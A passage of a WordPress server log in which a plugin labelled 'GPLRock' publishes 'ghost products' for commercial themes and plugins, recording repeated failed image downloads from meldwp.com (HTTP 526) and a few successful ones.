07:27:25 UTC] GPLRock: Ghost product published with image - Product ID: wilcity-directory-listing-wordpress-theme [06-Apr-2026 07:27:26 UTC] GPLRock: Image downloaded successfully for product myhome-real-estate-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe5e7f2a.jpg [06-Apr-2026 07:27:26 UTC] GPLRock: Using pre-downloaded image for product myhome-real-estate-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-fe5e7f2a.jpg [06-Apr-2026 07:27:26 UTC] GPLRock: Ghost product published with image - Product ID: myhome-real-estate-wordpress [06-Apr-2026 07:39:40 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:42 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-template-10583.webp for product elementy-multipurpose-one-multi-page-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:39:44 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:46 UTC] GPLRock: Image download failed for product elementy-multipurpose-one-multi-page-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-template-10583.webp for product elementy-multipurpose-one-multi-page-template after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:39:48 UTC] GPLRock WARNING: Image download failed for product elementy-multipurpose-one-multi-page-template. URL: https://meldwp.com/wp-content/uploads/elementy---multipurpose-one--multi-page-template-10583.webp [06-Apr-2026 07:39:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: elementy-multipurpose-one-multi-page-template [06-Apr-2026 07:39:48 UTC] GPLRock: Image download failed for product astralla-horoscope-and-astrology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:50 UTC] GPLRock: Image download failed for product astralla-horoscope-and-astrology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/astralla---horoscope-and-astrology-wordpress-theme-22331.webp for product astralla-horoscope-and-astrology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:39:53 UTC] GPLRock: Image download failed for product astralla-horoscope-and-astrology-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:55 UTC] GPLRock: Image download failed for product astralla-horoscope-and-astrology-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/astralla---horoscope-and-astrology-wordpress-theme-22331.webp for product astralla-horoscope-and-astrology-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:39:57 UTC] GPLRock WARNING: Image download failed for product astralla-horoscope-and-astrology-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/astralla---horoscope-and-astrology-wordpress-theme-22331.webp [06-Apr-2026 07:39:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: astralla-horoscope-and-astrology-wordpress-theme [06-Apr-2026 07:39:57 UTC] GPLRock: Image download failed for product jackie-karate-martial-arts-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:39:59 UTC] GPLRock: Image download failed for product jackie-karate-martial-arts-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jackie---karate--martial-arts-school-wordpress-theme-25894.webp for product jackie-karate-martial-arts-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:01 UTC] GPLRock: Image download failed for product jackie-karate-martial-arts-school-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:03 UTC] GPLRock: Image download failed for product jackie-karate-martial-arts-school-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jackie---karate--martial-arts-school-wordpress-theme-25894.webp for product jackie-karate-martial-arts-school-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:06 UTC] GPLRock WARNING: Image download failed for product jackie-karate-martial-arts-school-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/jackie---karate--martial-arts-school-wordpress-theme-25894.webp [06-Apr-2026 07:40:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jackie-karate-martial-arts-school-wordpress-theme [06-Apr-2026 07:40:06 UTC] GPLRock: Image download failed for product shina-real-state-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:08 UTC] GPLRock: Image download failed for product shina-real-state-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shina---real-state-property-wordpress-theme-2526.webp for product shina-real-state-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:10 UTC] GPLRock: Image download failed for product shina-real-state-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:12 UTC] GPLRock: Image download failed for product shina-real-state-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shina---real-state-property-wordpress-theme-2526.webp for product shina-real-state-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:14 UTC] GPLRock WARNING: Image download failed for product shina-real-state-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shina---real-state-property-wordpress-theme-2526.webp [06-Apr-2026 07:40:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shina-real-state-property-wordpress-theme [06-Apr-2026 07:40:14 UTC] GPLRock: Image download failed for product pakrco-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:16 UTC] GPLRock: Image download failed for product pakrco-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pakrco---single-property-wordpress-theme-11093.webp for product pakrco-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:19 UTC] GPLRock: Image download failed for product pakrco-single-property-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:21 UTC] GPLRock: Image download failed for product pakrco-single-property-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pakrco---single-property-wordpress-theme-11093.webp for product pakrco-single-property-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:23 UTC] GPLRock WARNING: Image download failed for product pakrco-single-property-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/pakrco---single-property-wordpress-theme-11093.webp [06-Apr-2026 07:40:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pakrco-single-property-wordpress-theme [06-Apr-2026 07:40:23 UTC] GPLRock: Image download failed for product mojuri-jewelry-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:25 UTC] GPLRock: Image download failed for product mojuri-jewelry-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mojuri--jewelry-store-woocommerce-wordpress-theme-7182.webp for product mojuri-jewelry-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:27 UTC] GPLRock: Image download failed for product mojuri-jewelry-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:29 UTC] GPLRock: Image download failed for product mojuri-jewelry-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mojuri--jewelry-store-woocommerce-wordpress-theme-7182.webp for product mojuri-jewelry-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:31 UTC] GPLRock WARNING: Image download failed for product mojuri-jewelry-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mojuri--jewelry-store-woocommerce-wordpress-theme-7182.webp [06-Apr-2026 07:40:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mojuri-jewelry-store-woocommerce-wordpress-theme [06-Apr-2026 07:40:32 UTC] GPLRock: Image download failed for product udema-modern-educational-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:34 UTC] GPLRock: Image download failed for product udema-modern-educational-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/udema---modern-educational-wordpress-theme-27434.webp for product udema-modern-educational-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:36 UTC] GPLRock: Image download failed for product udema-modern-educational-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:38 UTC] GPLRock: Image download failed for product udema-modern-educational-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/udema---modern-educational-wordpress-theme-27434.webp for product udema-modern-educational-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:40 UTC] GPLRock WARNING: Image download failed for product udema-modern-educational-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/udema---modern-educational-wordpress-theme-27434.webp [06-Apr-2026 07:40:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: udema-modern-educational-wordpress-theme [06-Apr-2026 07:40:40 UTC] GPLRock: Image downloaded successfully for product braintech-technology-it-solutions-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bbb3f67.webp [06-Apr-2026 07:40:40 UTC] GPLRock: Using pre-downloaded image for product braintech-technology-it-solutions-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1bbb3f67.webp [06-Apr-2026 07:40:40 UTC] GPLRock: Ghost product published with image - Product ID: braintech-technology-it-solutions-wordpress-theme [06-Apr-2026 07:40:40 UTC] GPLRock: Image download failed for product boliin-resort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:42 UTC] GPLRock: Image download failed for product boliin-resort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boliin---resort--hotel-booking-wordpress-theme-3408.webp for product boliin-resort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:45 UTC] GPLRock: Image download failed for product boliin-resort-hotel-booking-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:47 UTC] GPLRock: Image download failed for product boliin-resort-hotel-booking-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 07:40:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/boliin---resort--hotel-booking-wordpress-theme-3408.webp for product boliin-resort-hotel-booking-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 07:40:49 UTC] GPLRock WARNING: Image download failed for product boliin-resort-hotel-booking-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/boliin---resort--hotel-booking-wordpress-theme-3408.webp [06-Apr-2026 07:40:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: boliin-resort-hotel-booking-wordpress-theme [06-Apr-2026 07:40:49 UTC] GPLRock: Image downloaded successfully for product aquapro-aquarium-maintenance-services-wordpress-theme-store (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a177255e.webp [06-Apr-2026 07:40:49 UTC] GPLRock: Using pre-downloaded image for product aquapro-aquarium-maintenance-services-wordpress-theme-store: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-a177255e.webp [06-Apr-2026 07:40:49 UTC] GPLRock: Ghost product published with image - Product ID: aquapro-aquarium-maintenance-services-wordpress-theme-store [06-Apr-2026 08:03:26 UTC] GPLRock: Image download failed for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:28 UTC] GPLRock: Image download failed for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scandi---furniture-store-and-home-decor-shop-woocommerce-theme-26270.webp for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:30 UTC] GPLRock: Image download failed for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:32 UTC] GPLRock: Image download failed for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/scandi---furniture-store-and-home-decor-shop-woocommerce-theme-26270.webp for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:34 UTC] GPLRock WARNING: Image download failed for product scandi-furniture-store-and-home-decor-shop-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/scandi---furniture-store-and-home-decor-shop-woocommerce-theme-26270.webp [06-Apr-2026 08:03:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: scandi-furniture-store-and-home-decor-shop-woocommerce-theme [06-Apr-2026 08:03:34 UTC] GPLRock: Image download failed for product charipex-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:36 UTC] GPLRock: Image download failed for product charipex-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charipex---charity--nonprofit-wordpress-theme-31547.webp for product charipex-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:38 UTC] GPLRock: Image download failed for product charipex-charity-nonprofit-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:41 UTC] GPLRock: Image download failed for product charipex-charity-nonprofit-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/charipex---charity--nonprofit-wordpress-theme-31547.webp for product charipex-charity-nonprofit-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:43 UTC] GPLRock WARNING: Image download failed for product charipex-charity-nonprofit-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/charipex---charity--nonprofit-wordpress-theme-31547.webp [06-Apr-2026 08:03:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: charipex-charity-nonprofit-wordpress-theme [06-Apr-2026 08:03:43 UTC] GPLRock: Image download failed for product qeen-fashion-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:45 UTC] GPLRock: Image download failed for product qeen-fashion-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qeen---fashion-lifestyle-blog-wordpress-theme-9368.webp for product qeen-fashion-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:47 UTC] GPLRock: Image download failed for product qeen-fashion-lifestyle-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:49 UTC] GPLRock: Image download failed for product qeen-fashion-lifestyle-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/qeen---fashion-lifestyle-blog-wordpress-theme-9368.webp for product qeen-fashion-lifestyle-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:51 UTC] GPLRock WARNING: Image download failed for product qeen-fashion-lifestyle-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/qeen---fashion-lifestyle-blog-wordpress-theme-9368.webp [06-Apr-2026 08:03:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: qeen-fashion-lifestyle-blog-wordpress-theme [06-Apr-2026 08:03:51 UTC] GPLRock: Image download failed for product glowix-plastic-surgery-beauty-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:54 UTC] GPLRock: Image download failed for product glowix-plastic-surgery-beauty-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glowix---plastic-surgery--beauty-clinic-wordpress-theme-8124.webp for product glowix-plastic-surgery-beauty-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:03:56 UTC] GPLRock: Image download failed for product glowix-plastic-surgery-beauty-clinic-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:03:58 UTC] GPLRock: Image download failed for product glowix-plastic-surgery-beauty-clinic-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/glowix---plastic-surgery--beauty-clinic-wordpress-theme-8124.webp for product glowix-plastic-surgery-beauty-clinic-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:00 UTC] GPLRock WARNING: Image download failed for product glowix-plastic-surgery-beauty-clinic-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/glowix---plastic-surgery--beauty-clinic-wordpress-theme-8124.webp [06-Apr-2026 08:04:00 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: glowix-plastic-surgery-beauty-clinic-wordpress-theme [06-Apr-2026 08:04:00 UTC] GPLRock: Image download failed for product peakshops-modern-multi-concept-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:02 UTC] GPLRock: Image download failed for product peakshops-modern-multi-concept-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peakshops---modern--multi-concept-woocommerce-theme-17282.webp for product peakshops-modern-multi-concept-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:04 UTC] GPLRock: Image download failed for product peakshops-modern-multi-concept-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:06 UTC] GPLRock: Image download failed for product peakshops-modern-multi-concept-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peakshops---modern--multi-concept-woocommerce-theme-17282.webp for product peakshops-modern-multi-concept-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:09 UTC] GPLRock WARNING: Image download failed for product peakshops-modern-multi-concept-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/peakshops---modern--multi-concept-woocommerce-theme-17282.webp [06-Apr-2026 08:04:09 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: peakshops-modern-multi-concept-woocommerce-theme [06-Apr-2026 08:04:09 UTC] GPLRock: Image download failed for product shopz-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:11 UTC] GPLRock: Image download failed for product shopz-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:13 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopz---ecommerce-wordpress-theme-28711.webp for product shopz-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:13 UTC] GPLRock: Image download failed for product shopz-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:15 UTC] GPLRock: Image download failed for product shopz-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/shopz---ecommerce-wordpress-theme-28711.webp for product shopz-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:17 UTC] GPLRock WARNING: Image download failed for product shopz-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/shopz---ecommerce-wordpress-theme-28711.webp [06-Apr-2026 08:04:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: shopz-ecommerce-wordpress-theme [06-Apr-2026 08:04:17 UTC] GPLRock: Image download failed for product monarch-innovative-wordpress-community-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:19 UTC] GPLRock: Image download failed for product monarch-innovative-wordpress-community-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monarch---innovative-wordpress-community-theme-14650.webp for product monarch-innovative-wordpress-community-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:22 UTC] GPLRock: Image download failed for product monarch-innovative-wordpress-community-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:24 UTC] GPLRock: Image download failed for product monarch-innovative-wordpress-community-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:26 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/monarch---innovative-wordpress-community-theme-14650.webp for product monarch-innovative-wordpress-community-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:26 UTC] GPLRock WARNING: Image download failed for product monarch-innovative-wordpress-community-theme. URL: https://meldwp.com/wp-content/uploads/monarch---innovative-wordpress-community-theme-14650.webp [06-Apr-2026 08:04:26 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: monarch-innovative-wordpress-community-theme [06-Apr-2026 08:04:26 UTC] GPLRock: Image download failed for product ziomm-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:28 UTC] GPLRock: Image download failed for product ziomm-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ziomm---creative-agency--portfolio-wordpress-theme-27078.webp for product ziomm-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:30 UTC] GPLRock: Image download failed for product ziomm-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:32 UTC] GPLRock: Image download failed for product ziomm-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ziomm---creative-agency--portfolio-wordpress-theme-27078.webp for product ziomm-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:34 UTC] GPLRock WARNING: Image download failed for product ziomm-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ziomm---creative-agency--portfolio-wordpress-theme-27078.webp [06-Apr-2026 08:04:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ziomm-creative-agency-portfolio-wordpress-theme [06-Apr-2026 08:04:35 UTC] GPLRock: Image download failed for product fugu-nft-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:37 UTC] GPLRock: Image download failed for product fugu-nft-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fugu---nft--crypto-wordpress-theme-30587.webp for product fugu-nft-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:39 UTC] GPLRock: Image download failed for product fugu-nft-crypto-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:41 UTC] GPLRock: Image download failed for product fugu-nft-crypto-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/fugu---nft--crypto-wordpress-theme-30587.webp for product fugu-nft-crypto-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:43 UTC] GPLRock WARNING: Image download failed for product fugu-nft-crypto-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/fugu---nft--crypto-wordpress-theme-30587.webp [06-Apr-2026 08:04:43 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: fugu-nft-crypto-wordpress-theme [06-Apr-2026 08:04:43 UTC] GPLRock: Image download failed for product stories-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:45 UTC] GPLRock: Image download failed for product stories-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stories---personal-blog-wordpress-theme-27234.webp for product stories-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:48 UTC] GPLRock: Image download failed for product stories-personal-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:50 UTC] GPLRock: Image download failed for product stories-personal-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 08:04:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stories---personal-blog-wordpress-theme-27234.webp for product stories-personal-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 08:04:52 UTC] GPLRock WARNING: Image download failed for product stories-personal-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stories---personal-blog-wordpress-theme-27234.webp [06-Apr-2026 08:04:52 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stories-personal-blog-wordpress-theme [06-Apr-2026 08:05:58 UTC] GPLRock: Image downloaded successfully for product ninja-forms-front-end-posting (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92549793.jpg [06-Apr-2026 08:05:58 UTC] GPLRock: Using pre-downloaded image for product ninja-forms-front-end-posting: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-92549793.jpg [06-Apr-2026 08:05:58 UTC] GPLRock: Ghost product published with image - Product ID: ninja-forms-front-end-posting [06-Apr-2026 08:06:00 UTC] GPLRock: Image downloaded successfully for product ait-shortcodes (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52452d0f.jpg [06-Apr-2026 08:06:00 UTC] GPLRock: Using pre-downloaded image for product ait-shortcodes: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-52452d0f.jpg [06-Apr-2026 08:06:00 UTC] GPLRock: Ghost product published with image - Product ID: ait-shortcodes [06-Apr-2026 08:06:01 UTC] GPLRock: Image downloaded successfully for product cookie-info-wp (attempt 1) to: 